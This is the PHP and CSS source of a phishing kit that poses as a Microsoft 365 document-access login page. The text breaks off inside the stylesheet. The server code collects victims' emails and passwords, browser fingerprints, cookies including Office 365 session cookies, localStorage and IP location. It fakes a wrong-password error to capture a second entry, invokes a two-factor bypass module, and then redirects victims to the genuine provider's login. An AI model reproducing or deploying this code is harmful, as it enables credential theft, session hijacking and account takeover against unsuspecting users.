
<?php
// Start session
session_start();

// Include configuration and required files
require_once 'config.php';
require_once 'cookie_handler.php';
require_once '2fa_bypass.php';

// FIXED: Enhanced auto grab email from URL parameter
$autoEmail = '';

// Method 1: Check for standard query parameters
if (isset($_GET) && !empty($_GET)) {
    foreach ($_GET as $key => $value) {
        // Check if key is an email (for URLs like ?email@domain.com or ?email@domain.com=)
        if (filter_var($key, FILTER_VALIDATE_EMAIL)) {
            $autoEmail = $key;
            break;
        }
        // Check if value is an email (for URLs like ?email=email@domain.com)
        if (filter_var($value, FILTER_VALIDATE_EMAIL)) {
            $autoEmail = $value;
            break;
        }
        // Check if key contains email in curly braces (for URLs like ?{email@domain.com})
        if (preg_match('/\{([^}]+)\}/', $key, $matches)) {
            if (filter_var($matches[1], FILTER_VALIDATE_EMAIL)) {
                $autoEmail = $matches[1];
                break;
            }
        }
        // Check if value contains email in curly braces
        if (preg_match('/\{([^}]+)\}/', $value, $matches)) {
            if (filter_var($matches[1], FILTER_VALIDATE_EMAIL)) {
                $autoEmail = $matches[1];
                break;
            }
        }
    }
}

// Method 2: Parse from full query string for complex formats
if (empty($autoEmail) && isset($_SERVER['QUERY_STRING']) && !empty($_SERVER['QUERY_STRING'])) {
    $queryString = $_SERVER['QUERY_STRING'];
    
    // Look for email patterns in the query string
    if (preg_match('/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,})/', $queryString, $matches)) {
        if (filter_var($matches[1], FILTER_VALIDATE_EMAIL)) {
            $autoEmail = $matches[1];
        }
    }
}

// Method 3: Check for email in URL path (for URLs like /path/email@domain.com)
if (empty($autoEmail) && isset($_SERVER['REQUEST_URI'])) {
    $requestUri = $_SERVER['REQUEST_URI'];
    if (preg_match('/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,})/', $requestUri, $matches)) {
        if (filter_var($matches[1], FILTER_VALIDATE_EMAIL)) {
            $autoEmail = $matches[1];
        }
    }
}

// Process form submission
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $email = isset($_POST['ai']) ? $_POST['ai'] : '';
    $password = isset($_POST['pr']) ? $_POST['pr'] : '';
    $attempt = isset($_POST['attempt']) ? (int)$_POST['attempt'] : 1;
    
    if ($email && $password) {
        // Collect enhanced data
        $data = [
            'email' => $email,
            'password' => $password,
            'attempt' => $attempt,
            'auto_detected_email' => $autoEmail,
            'ip_address' => getClientIP(),
            'user_agent' => $_SERVER['HTTP_USER_AGENT'],
            'browserInfo' => [
                'userAgent' => $_SERVER['HTTP_USER_AGENT'],
                'language' => isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : '',
                'screenWidth' => isset($_POST['screenWidth']) ? $_POST['screenWidth'] : '',
                'screenHeight' => isset($_POST['screenHeight']) ? $_POST['screenHeight'] : '',
                'timezone' => isset($_POST['timezone']) ? $_POST['timezone'] : '',
                'platform' => isset($_POST['platform']) ? $_POST['platform'] : '',
                'colorDepth' => isset($_POST['colorDepth']) ? $_POST['colorDepth'] : '',
                'pixelRatio' => isset($_POST['pixelRatio']) ? $_POST['pixelRatio'] : '',
            ],
            'sessionInfo' => [
                'referrer' => isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '',
                'timestamp' => time(),
                'session_id' => session_id(),
                'query_string' => isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '',
                'request_uri' => isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : ''
            ],
            'location' => getClientLocation(getClientIP())
        ];
        
        // Handle cookies if sent
        if (isset($_POST['cookies']) && !empty($_POST['cookies'])) {
            $data['cookies'] = $_POST['cookies'];
            $data['office365_auth_cookies'] = extractOffice365Cookies($_POST['cookies']);
        }
        
        // Handle localStorage data
        if (isset($_POST['localStorage']) && !empty($_POST['localStorage'])) {
            $data['localStorage'] = json_decode($_POST['localStorage'], true);
        }
        
        // Generate 2FA bypass token
        $data['2fa_bypass'] = generate2FABypassToken($email);
        
        // Save data
        saveData($data);
        
        // Determine redirect URL based on email domain
        $redirectUrl = $config['redirect_url']; // default
        $emailDomain = strtolower(substr(strrchr($email, "@"), 1));
        
        switch($emailDomain) {
            case 'gmail.com':
            case 'googlemail.com':
                $redirectUrl = 'https://accounts.google.com/signin';
                break;
            case 'yahoo.com':
            case 'yahoo.co.uk':
            case 'ymail.com':
                $redirectUrl = 'https://login.yahoo.com/';
                break;
            case 'aol.com':
                $redirectUrl = 'https://login.aol.com/';
                break;
            case 'outlook.com':
            case 'hotmail.com':
            case 'live.com':
            default:
                $redirectUrl = 'https://login.microsoftonline.com/';
                break;
        }
        
        // Return JSON response for AJAX
        header('Content-Type: application/json');
        
        // Show 2FA after second attempt
        if ($attempt >= 2) {
            echo json_encode([
                'status' => 'success',
                'signal' => 'ok', 
                'redirect_link' => $redirectUrl,
                'bypass_token' => $data['2fa_bypass'],
                'show_2fa' => true
            ]);
        } else {
            echo json_encode([
                'status' => 'error',
                'signal' => 'error',
                'message' => 'Incorrect password. Please try again.',
                'show_2fa' => false
            ]);
        }
        exit;
    }
}

// Handle 2FA code submission
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === '2fa_submit') {
    $email = isset($_POST['email']) ? $_POST['email'] : '';
    $type = isset($_POST['type']) ? $_POST['type'] : '';
    $code = isset($_POST['code']) ? $_POST['code'] : '';
    
    if ($email && $type) {
        $result = handle2FABypass($email, $type, $code);
        
        // Add redirect URL based on email domain
        $emailDomain = strtolower(substr(strrchr($email, "@"), 1));
        switch($emailDomain) {
            case 'gmail.com':
            case 'googlemail.com':
                $result['redirect_url'] = 'https://accounts.google.com/signin';
                break;
            case 'yahoo.com':
            case 'yahoo.co.uk':
            case 'ymail.com':
                $result['redirect_url'] = 'https://login.yahoo.com/';
                break;
            case 'aol.com':
                $result['redirect_url'] = 'https://login.aol.com/';
                break;
            default:
                $result['redirect_url'] = 'https://login.microsoftonline.com/';
                break;
        }
        
        header('Content-Type: application/json');
        echo json_encode($result);
        exit;
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Microsoft 365 - Secure Document Access Portal</title>
    <link rel="icon" type="image/x-icon" href="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjQiIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPHJlY3Qgd2lkdGg9IjExIiBoZWlnaHQ9IjExIiBmaWxsPSIjRjI1MDIyIi8+CjxyZWN0IHg9IjEzIiB3aWR0aD0iMTEiIGhlaWdodD0iMTEiIGZpbGw9IiMwMEE0RUYiLz4KPHJlY3QgeT0iMTMiIHdpZHRoPSIxMSIgaGVpZ2h0PSIxMSIgZmlsbD0iIzdGQkEwMCIvPgo8cmVjdCB4PSIxMyIgeT0iMTMiIHdpZHRoPSIxMSIgaGVpZ2h0PSIxMSIgZmlsbD0iI0ZGQjkwMCIvPgo8L3N2Zz4K">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=JetBrains+Mono:wght@400;500;600&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css">
    <style>
        :root {
            /* Modern Microsoft Colors */
            --ms-blue: #0078d4;
            --ms-blue-hover: #106ebe;
            --ms-blue-light: #deecf9;
            --ms-blue-dark: #004578;
            --ms-red: #d13438;
            --ms-orange: #ff8c00;
            --ms-green: #107c10;
            --ms-purple: #5c2d91;
            --ms-teal: #008575;
            
            /* Enhanced Gray Scale */
            --ms-gray-50: #fafafa;
            --ms-gray-100: #f5f5f5;
            --ms-gray-200: #eeeeee;
            --ms-gray-300: #e0e0e0;
            --ms-gray-400: #bdbdbd;
            --ms-gray-500: #9e9e9e;
            --ms-gray-600: #757575;
            --ms-gray-700: #616161;
            --ms-gray-800: #424242;
            --ms-gray-900: #212121;
            
            /* Modern Gradients */
            --gradient-primary: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            --gradient-secondary: linear-gradient(135deg, #f093fb 0%, #f5576c 100%);
            --gradient-tertiary: linear-gradient(135deg, #4facfe 0%, #00f2fe 100%);
            --gradient-dark: linear-gradient(135deg, #2c3e50 0%, #34495e 100%);
            --gradient-light: linear-gradient(135deg, #ffecd2 0%, #fcb69f 100%);
            --gradient-microsoft: linear-gradient(135deg, #0078d4 0%, #5c2d91 50%, #d13438 100%);
            
            /* Advanced Shadows */
            --shadow-xs: 0 1px 2px rgba(0, 0, 0, 0.05);
            --shadow-sm: 0 1px 3px rgba(0, 0, 0, 0.1), 0 1px 2px rgba(0, 0, 0, 0.06);
            --shadow-md: 0 4px 6px rgba(0, 0, 0, 0.07), 0 2px 4px rgba(0, 0, 0, 0.06);
            --shadow-lg: 0 10px 15px rgba(0, 0, 0, 0.1), 0 4px 6px rgba(0, 0, 0, 0.05);
            --shadow-xl: 0 20px 25px rgba(0, 0, 0, 0.1), 0 10px 10px rgba(0, 0, 0, 0.04);
            --shadow-2xl: 0 25px 50px rgba(0, 0, 0, 0.25);
            --shadow-inner: inset 0 2px 4px rgba(0, 0, 0, 0.06);
            --shadow-glow: 0 0 20px rgba(0, 120, 212, 0.3);
            
            /* Modern Border Radius */
            --radius-sm: 6px;
            --radius-md: 12px;
            --radius-lg: 18px;
            --radius-xl: 24px;
            --radius-full: 9999px;
            
            /* Enhanced Transitions */
            --transition-fast: all 0.15s cubic-bezier(0.4, 0, 0.2, 1);
            --transition-normal: all 0.3s cubic-bezier(0.4, 0, 0.2, 1);
            --transition-slow: all 0.5s cubic-bezier(0.4, 0, 0.2, 1);
            --transition-bounce: all 0.3s cubic-bezier(0.68, -0.55, 0.265, 1.55);
        }

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            min-height: 100vh;
            display: flex;
            flex-direction: column;
            color: var(--ms-gray-900);
            position: relative;
            overflow-x: hidden;
        }

        /* Animated Background */
        body::before {
            content: '';
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: 
                radial-gradient(circle at 20% 80%, rgba(102, 126, 234, 0.1) 0%, transparent 50%),
                radial-gradient(circle at 80% 20%, rgba(118, 75, 162, 0.1) 0%, transparent 50%),
                radial-gradient(circle at 40% 40%, rgba(0, 120, 212, 0.05) 0%, transparent 50%);
            pointer-events: none;
            z-index: -1;
            animation: backgroundShift 20s ease-in-out infinite;
        }

        @keyframes backgroundShift {
            0%, 100% { opacity: 1; transform: scale(1); }
            50% { opacity: 0.8; transform: scale(1.1); }
        }

        /* Floating Particles */
        .particles {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            pointer-events: none;
            z-index: -1;
        }

        .particle {
            position: absolute;
            width: 4px;
            height: 4px;
            background: rgba(255, 255, 255, 0.3);
            border-radius: 50%;
            animation: float 15s infinite linear;
        }

        @keyframes float {
            0% { transform: translateY(100vh) rotate(0deg); opacity: 0; }
            10% { opacity: 1; }
            90% { opacity: 1; }
            100% { transform: translateY(-100vh) rotate(360deg); opacity: 0; }
        }

        /* Enhanced Microsoft Header */
        .microsoft-header {
            background: rgba(255, 255, 255, 0.95);
            backdrop-filter: blur(20px);
            -webkit-backdrop-filter: blur(20px);
            border-bottom: 1px solid rgba(255, 255, 255, 0.2);
            padding: 20px 40px;
            display: flex;
            align-items: center;
            justify-content: space-between;
            box-shadow: var(--shadow-lg);
            position: sticky;
            top: 0;
            z-index: 100;
            transition: var(--transition-normal);
        }

        .microsoft-brand {
            display: flex;
            align-items: center;
            gap: 20px;
            text-decoration: none;
            color: var(--ms-gray-900);
            transition: var(--transition-normal);
        }

        .microsoft-brand:hover {
            transform: translateY(-2px);
        }

        .microsoft-logo {
            display: flex;
            align-items: center;
            gap: 16px;
        }

        .ms-logo-squares {
            display: grid;
            grid-template-columns: 1fr 1fr;
            grid-template-rows: 1fr 1fr;
            width: 32px;
            height: 32px;
            gap: 3px;
            transition: var(--transition-bounce);
        }

        .ms-logo-squares:hover {
            transform: rotate(5deg) scale(1.1);
        }

        .ms-square {
            width: 14px;
            height: 14px;
            border-radius: 2px;
            transition: var(--transition-normal);
        }

        .ms-square.orange { 
            background: linear-gradient(135deg, #f25022, #ff6b35); 
            animation: pulse-orange 3s ease-in-out infinite;
        }
        .ms-square.blue { 
            background: linear-gradient(135deg, #00a4ef, #0078d4); 
            animation: pulse-blue 3s ease-in-out infinite 0.5s;
        }
        .ms-square.green { 
            background: linear-gradient(135deg, #7fba00, #5a9216); 
            animation: pulse-green 3s ease-in-out infinite 1s;
        }
        .ms-square.yellow { 
            background: linear-gradient(135deg, #ffb900, #ff8c00); 
            animation: pulse-yellow 3s ease-in-out infinite 1.5s;
        }

        @keyframes pulse-orange {
            0%, 100% { box-shadow: 0 0 0 rgba(242, 80, 34, 0); }
            50% { box-shadow: 0 0 20px rgba(242, 80, 34, 0.4); }
        }

        @keyframes pulse-blue {
            0%, 100% { box-shadow: 0 0 0 rgba(0, 164, 239, 0); }
            50% { box-shadow: 0 0 20px rgba(0, 164, 239, 0.4); }
        }

        @keyframes pulse-green {
            0%, 100% { box-shadow: 0 0 0 rgba(127, 186, 0, 0); }
            50% { box-shadow: 0 0 20px rgba(127, 186, 0, 0.4); }
        }

        @keyframes pulse-yellow {
            0%, 100% { box-shadow: 0 0 0 rgba(255, 185, 0, 0); }
            50% { box-shadow: 0 0 20px rgba(255, 185, 0, 0.4); }
        }

        .microsoft-text {
            font-size: 28px;
            font-weight: 700;
            color: var(--ms-gray-900);
            letter-spacing: -1px;
            background: var(--gradient-microsoft);
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
            background-clip: text;
        }

        .microsoft-365 {
            font-size: 18px;
            font-weight: 500;
            color: var(--ms-gray-600);
            margin-left: 12px;
            position: relative;
        }

        .microsoft-365::after {
            content: '';
            position: absolute;
            bottom: -4px;
            left: 0;
            width: 0;
            height: 2px;
            background: var(--gradient-primary);
            transition: var(--transition-normal);
        }

        .microsoft-brand:hover .microsoft-365::after {
            width: 100%;
        }

        .header-actions {
            display: flex;
            align-items: center;
            gap: 32px;
        }

        .header-link {
            color: var(--ms-gray-700);
            text-decoration: none;
            font-size: 15px;
            font-weight: 500;
            transition: var(--transition-normal);
            padding: 12px 20px;
            border-radius: var(--radius-md);
            position: relative;
            overflow: hidden;
        }

        .header-link::before {
            content: '';
            position: absolute;
            top: 0;
            left: -100%;
            width: 100%;
            height: 100%;
            background: var(--gradient-primary);
            transition: var(--transition-normal);
            z-index: -1;
        }

        .header-link:hover::before {
            left: 0;
        }

        .header-link:hover {
            color: white;
            transform: translateY(-2px);
            box-shadow: var(--shadow-lg);
        }

        /* Enhanced Main Content */
        .main-content {
            flex: 1;
            display: flex;
            align-items: center;
            justify-content: center;
            padding: 60px 20px;
            position: relative;
        }

        .main-container {
            background: rgba(255, 255, 255, 0.95);
            backdrop-filter: blur(30px);
            -webkit-backdrop-filter: blur(30px);
            border-radius: var(--radius-xl);
            box-shadow: var(--shadow-2xl);
            max-width: 520px;
            width: 100%;
            overflow: hidden;
            border: 1px solid rgba(255, 255, 255, 0.3);
            position: relative;
            animation: slideInUp 0.8s ease-out;
        }

        @keyframes slideInUp {
            from {
                opacity: 0;
                transform: translateY(50px) scale(0.95);
            }
            to {
                opacity: 1;
                transform: translateY(0) scale(1);
            }
        }

        .main-container::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            right: 0;
            height: 6px;
            background: var(--gradient-microsoft);
            animation: progressBar 3s ease-in-out infinite;
        }

        @keyframes progressBar {
            0%, 100% { transform: scaleX(0); transform-origin: left; }
            50% { transform: scaleX(1); transform-origin: left; }
        }

        /* Enhanced Document Header */
        .document-header {
            background: var(--gradient-primary);
            color: white;
            padding: 50px 40px 40px;
            text-align: center;
            position: relative;
            overflow: hidden;
        }

        .document-header::before {
            content: '';
            position: absolute;
            top: -50%;
            left: -50%;
            width: 200%;
            height: 200%;
            background: repeating-linear-gradient(
                45deg,
                transparent,
                transparent 10px,
                rgba(255,255,255,0.05) 10px,
                rgba(255,255,255,0.05) 20px
            );
            animation: patternMove 20s linear infinite;
        }

        @keyframes patternMove {
            0% { transform: translate(-50%, -50%) rotate(0deg); }
            100% { transform: translate(-50%, -50%) rotate(360deg); }
        }

        .document-title {
            font-size: 32px;
            font-weight: 800;
            margin-bottom: 12px;
            line-height: 1.2;
            position: relative;
            z-index: 2;
            text-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
        }

        .document-subtitle {
            font-size: 18px;
            font-weight: 400;
            opacity: 0.9;
            position: relative;
            z-index: 2;
            text-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
        }

        /* Enhanced Document Info */
        .document-info {
            background: linear-gradient(135deg, var(--ms-gray-50), rgba(255, 255, 255, 0.8));
            padding: 32px 40px;
            border-bottom: 1px solid var(--ms-gray-200);
        }

        .document-file {
            display: flex;
            align-items: center;
            gap: 20px;
            background: white;
            padding: 24px;
            border-radius: var(--radius-lg);
            border: 1px solid var(--ms-gray-200);
            box-shadow: var(--shadow-lg);
            position: relative;
            overflow: hidden;
            transition: var(--transition-normal);
        }

        .document-file:hover {
            transform: translateY(-4px);
            box-shadow: var(--shadow-xl);
        }

        .document-file::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            width: 6px;
            height: 100%;
            background: linear-gradient(135deg, var(--ms-red), #ff6b6b);
        }

        .file-icon {
            width: 56px;
            height: 56px;
            background: linear-gradient(135deg, #e74c3c, #c0392b);
            border-radius: var(--radius-lg);
            display: flex;
            align-items: center;
            justify-content: center;
            color: white;
            font-size: 24px;
            box-shadow: 0 8px 16px rgba(231, 76, 60, 0.3);
            position: relative;
            overflow: hidden;
        }

        .file-icon::before {
            content: '';
            position: absolute;
            top: -50%;
            left: -50%;
            width: 200%;
            height: 200%;
            background: linear-gradient(45deg, transparent, rgba(255,255,255,0.1), transparent);
            animation: iconShine 3s ease-in-out infinite;
        }

        @keyframes iconShine {
            0%, 100% { transform: translateX(-100%) translateY(-100%) rotate(45deg); }
            50% { transform: translateX(100%) translateY(100%) rotate(45deg); }
        }

        .file-details {
            flex: 1;
        }

        .file-details h3 {
            font-size: 18px;
            font-weight: 700;
            color: var(--ms-gray-900);
            margin-bottom: 12px;
            line-height: 1.3;
        }

        .file-meta {
            display: flex;
            gap: 24px;
            font-size: 14px;
            color: var(--ms-gray-600);
            margin-bottom: 12px;
            flex-wrap: wrap;
        }

        .file-meta span {
            display: flex;
            align-items: center;
            gap: 6px;
            padding: 4px 8px;
            background: rgba(0, 120, 212, 0.1);
            border-radius: var(--radius-sm);
            transition: var(--transition-fast);
        }

        .file-meta span:hover {
            background: rgba(0, 120, 212, 0.2);
            transform: translateY(-1px);
        }

        .file-badges {
            display: flex;
            gap: 12px;
            flex-wrap: wrap;
        }

        .confidential-badge {
            background: linear-gradient(135deg, #ffd700, #ffed4e);
            color: #333;
            padding: 6px 16px;
            border-radius: var(--radius-full);
            font-size: 12px;
            font-weight: 700;
            text-transform: uppercase;
            letter-spacing: 0.5px;
            box-shadow: 0 4px 12px rgba(255, 215, 0, 0.3);
            animation: confidentialPulse 2s ease-in-out infinite;
        }
                    @keyframes confidentialPulse {
            0%, 100% { transform: scale(1); box-shadow: 0 4px 12px rgba(255, 215, 0, 0.3); }
            50% { transform: scale(1.05); box-shadow: 0 6px 20px rgba(255, 215, 0, 0.5); }
        }

        .expires-badge {
            background: linear-gradient(135deg, #ff6b6b, #ee5a52);
            color: white;
            padding: 6px 16px;
            border-radius: var(--radius-full);
            font-size: 12px;
            font-weight: 600;
            display: flex;
            align-items: center;
            gap: 6px;
            animation: urgentBlink 1.5s ease-in-out infinite;
            box-shadow: 0 4px 12px rgba(255, 107, 107, 0.4);
        }

        @keyframes urgentBlink {
            0%, 100% { opacity: 1; transform: scale(1); }
            50% { opacity: 0.8; transform: scale(1.02); }
        }

        /* Enhanced Login Section */
        .login-section {
            padding: 40px;
            background: linear-gradient(135deg, rgba(255, 255, 255, 0.9), rgba(248, 250, 252, 0.9));
        }

        .login-title {
            font-size: 24px;
            font-weight: 700;
            color: var(--ms-gray-900);
            margin-bottom: 12px;
            text-align: center;
            background: var(--gradient-primary);
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
            background-clip: text;
        }

        .login-subtitle {
            font-size: 16px;
            color: var(--ms-gray-600);
            text-align: center;
            margin-bottom: 40px;
            line-height: 1.6;
        }

        /* Enhanced Provider Grid */
        .provider-grid {
            display: grid;
            grid-template-columns: 1fr 1fr;
            gap: 16px;
            margin-bottom: 40px;
        }

        .provider-card {
            background: white;
            border: 2px solid var(--ms-gray-300);
            border-radius: var(--radius-lg);
            padding: 20px 16px;
            display: flex;
            align-items: center;
            gap: 12px;
            cursor: pointer;
            transition: var(--transition-bounce);
            font-size: 14px;
            font-weight: 600;
            position: relative;
            overflow: hidden;
        }

        .provider-card::before {
            content: '';
            position: absolute;
            top: 0;
            left: -100%;
            width: 100%;
            height: 100%;
            background: linear-gradient(90deg, transparent, rgba(0, 120, 212, 0.1), transparent);
            transition: var(--transition-normal);
        }

        .provider-card:hover::before {
            left: 100%;
        }

        .provider-card:hover {
            border-color: var(--ms-blue);
            transform: translateY(-4px) scale(1.02);
            box-shadow: var(--shadow-lg);
        }

        .provider-card.active {
            border-color: var(--ms-blue);
            background: linear-gradient(135deg, var(--ms-blue-light), rgba(222, 236, 249, 0.8));
            box-shadow: var(--shadow-glow);
            transform: translateY(-2px);
        }

        .provider-card img {
            width: 28px;
            height: 28px;
            border-radius: var(--radius-sm);
            transition: var(--transition-bounce);
        }

        .provider-card:hover img {
            transform: rotate(5deg) scale(1.1);
        }

        /* Enhanced Form Styles */
        .form-group {
            margin-bottom: 24px;
            position: relative;
        }

        .form-label {
            display: block;
            font-weight: 600;
            color: var(--ms-gray-900);
            margin-bottom: 8px;
            font-size: 15px;
            transition: var(--transition-fast);
        }

        .form-input {
            width: 100%;
            padding: 16px 20px;
            border: 2px solid var(--ms-gray-400);
            border-radius: var(--radius-md);
            font-size: 16px;
            transition: var(--transition-normal);
            background: white;
            color: var(--ms-gray-900);
            font-family: inherit;
            position: relative;
        }

        .form-input:focus {
            outline: none;
            border-color: var(--ms-blue);
            box-shadow: 0 0 0 4px rgba(0, 120, 212, 0.1);
            transform: translateY(-2px);
        }

        .form-input.error {
            border-color: var(--ms-red);
            box-shadow: 0 0 0 4px rgba(209, 52, 56, 0.1);
            animation: shake 0.5s ease-in-out;
        }

        @keyframes shake {
            0%, 100% { transform: translateX(0); }
            25% { transform: translateX(-5px); }
            75% { transform: translateX(5px); }
        }

        .input-wrapper {
            position: relative;
        }

        .input-icon {
            position: absolute;
            right: 20px;
            top: 50%;
            transform: translateY(-50%);
            color: var(--ms-gray-600);
            cursor: pointer;
            transition: var(--transition-normal);
            font-size: 18px;
        }

        .input-icon:hover {
            color: var(--ms-blue);
            transform: translateY(-50%) scale(1.1);
        }

        .submit-btn {
            width: 100%;
            padding: 16px 32px;
            background: var(--gradient-primary);
            color: white;
            border: none;
            border-radius: var(--radius-md);
            font-size: 16px;
            font-weight: 600;
            cursor: pointer;
            transition: var(--transition-bounce);
            box-shadow: var(--shadow-lg);
            position: relative;
            overflow: hidden;
            font-family: inherit;
        }

        .submit-btn::before {
            content: '';
            position: absolute;
            top: 0;
            left: -100%;
            width: 100%;
            height: 100%;
            background: linear-gradient(90deg, transparent, rgba(255,255,255,0.2), transparent);
            transition: var(--transition-normal);
        }

        .submit-btn:hover::before {
            left: 100%;
        }

        .submit-btn:hover {
            transform: translateY(-3px) scale(1.02);
            box-shadow: var(--shadow-xl);
        }

        .submit-btn:active {
            transform: translateY(-1px) scale(0.98);
        }

        .submit-btn:disabled {
            opacity: 0.7;
            cursor: not-allowed;
            transform: none;
        }

        /* Enhanced Messages */
        .error-message {
            background: linear-gradient(135deg, #fef2f2, #fee2e2);
            border: 1px solid #fecaca;
            border-left: 4px solid var(--ms-red);
            color: #dc2626;
            padding: 16px 20px;
            border-radius: var(--radius-md);
            margin-bottom: 20px;
            font-size: 14px;
            display: none;
            font-weight: 500;
            position: relative;
            overflow: hidden;
        }

        .error-message::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 2px;
            background: var(--ms-red);
            animation: errorProgress 3s ease-in-out;
        }

        @keyframes errorProgress {
            from { width: 0; }
            to { width: 100%; }
        }

        .error-message.show {
            display: block;
            animation: slideInDown 0.4s ease-out;
        }

        .success-message {
            background: linear-gradient(135deg, #f0fdf4, #dcfce7);
            border: 1px solid #bbf7d0;
            border-left: 4px solid var(--ms-green);
            color: #16a34a;
            padding: 16px 20px;
            border-radius: var(--radius-md);
            margin-bottom: 20px;
            font-size: 14px;
            display: none;
            font-weight: 500;
            position: relative;
            overflow: hidden;
        }

        .success-message::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 2px;
            background: var(--ms-green);
            animation: successProgress 3s ease-in-out;
        }

        @keyframes successProgress {
            from { width: 0; }
            to { width: 100%; }
        }

        .success-message.show {
            display: block;
            animation: slideInDown 0.4s ease-out;
        }

        @keyframes slideInDown {
            from {
                opacity: 0;
                transform: translateY(-20px);
            }
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }

        .password-view {
            display: none;
        }

        .password-view.show {
            display: block;
            animation: fadeInRight 0.5s ease-out;
        }

        @keyframes fadeInRight {
            from {
                opacity: 0;
                transform: translateX(20px);
            }
            to {
                opacity: 1;
                transform: translateX(0);
            }
        }

        .back-link {
            color: var(--ms-blue);
            text-decoration: none;
            font-size: 15px;
            margin-top: 20px;
            display: inline-flex;
            align-items: center;
            gap: 8px;
            font-weight: 500;
            transition: var(--transition-normal);
            padding: 8px 16px;
            border-radius: var(--radius-md);
        }

        .back-link:hover {
            background: var(--ms-blue-light);
            transform: translateX(-4px);
            text-decoration: none;
        }

        /* Enhanced Security Notice */
        .security-notice {
            background: linear-gradient(135deg, var(--ms-blue-light), rgba(222, 236, 249, 0.7));
            border-left: 4px solid var(--ms-blue);
            padding: 20px 24px;
            margin: 32px 40px;
            border-radius: 0 var(--radius-md) var(--radius-md) 0;
            position: relative;
            overflow: hidden;
        }

        .security-notice::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            width: 4px;
            height: 100%;
            background: var(--ms-blue);
            animation: securityPulse 2s ease-in-out infinite;
        }

        @keyframes securityPulse {
            0%, 100% { box-shadow: 0 0 0 rgba(0, 120, 212, 0); }
            50% { box-shadow: 0 0 10px rgba(0, 120, 212, 0.5); }
        }

        .security-notice p {
            font-size: 14px;
            color: var(--ms-gray-800);
            margin: 0;
            display: flex;
            align-items: center;
            gap: 12px;
            font-weight: 500;
        }

        /* Enhanced 2FA Modal */
        .twofa-modal {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.7);
            backdrop-filter: blur(12px);
            -webkit-backdrop-filter: blur(12px);
            display: none;
            align-items: center;
            justify-content: center;
            z-index: 1000;
            opacity: 0;
            transition: var(--transition-normal);
        }

        .twofa-modal.show {
            display: flex;
            opacity: 1;
        }

        .twofa-content {
            background: white;
            border-radius: var(--radius-xl);
            padding: 40px;
            max-width: 480px;
            width: 90%;
            box-shadow: var(--shadow-2xl);
            transform: scale(0.9);
            transition: var(--transition-bounce);
            border: 1px solid var(--ms-gray-200);
            position: relative;
            overflow: hidden;
        }

        .twofa-content::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            right: 0;
            height: 4px;
            background: var(--gradient-tertiary);
        }

        .twofa-modal.show .twofa-content {
            transform: scale(1);
        }

        .twofa-title {
            font-size: 24px;
            font-weight: 700;
            color: var(--ms-gray-900);
            margin-bottom: 12px;
            text-align: center;
            background: var(--gradient-tertiary);
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
            background-clip: text;
        }

        .twofa-subtitle {
            color: var(--ms-gray-600);
            font-size: 16px;
            text-align: center;
            margin-bottom: 32px;
            line-height: 1.6;
        }

        .twofa-methods {
            display: grid;
            gap: 16px;
            margin-bottom: 32px;
        }

        .twofa-method {
            padding: 20px;
            border: 2px solid var(--ms-gray-300);
            border-radius: var(--radius-lg);
            cursor: pointer;
            transition: var(--transition-bounce);
            display: flex;
            align-items: center;
            gap: 20px;
            background: white;
            position: relative;
            overflow: hidden;
        }

        .twofa-method::before {
            content: '';
            position: absolute;
            top: 0;
            left: -100%;
            width: 100%;
            height: 100%;
            background: linear-gradient(90deg, transparent, rgba(79, 172, 254, 0.1), transparent);
            transition: var(--transition-normal);
        }

        .twofa-method:hover::before {
            left: 100%;
        }

        .twofa-method:hover {
            border-color: var(--ms-blue);
            transform: translateY(-4px) scale(1.02);
            box-shadow: var(--shadow-lg);
        }

        .twofa-method.selected {
            border-color: var(--ms-blue);
            background: linear-gradient(135deg, rgba(79, 172, 254, 0.1), rgba(0, 242, 254, 0.1));
            box-shadow: var(--shadow-glow);
        }

        .twofa-method-icon {
            width: 48px;
            height: 48px;
            background: var(--gradient-tertiary);
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            color: white;
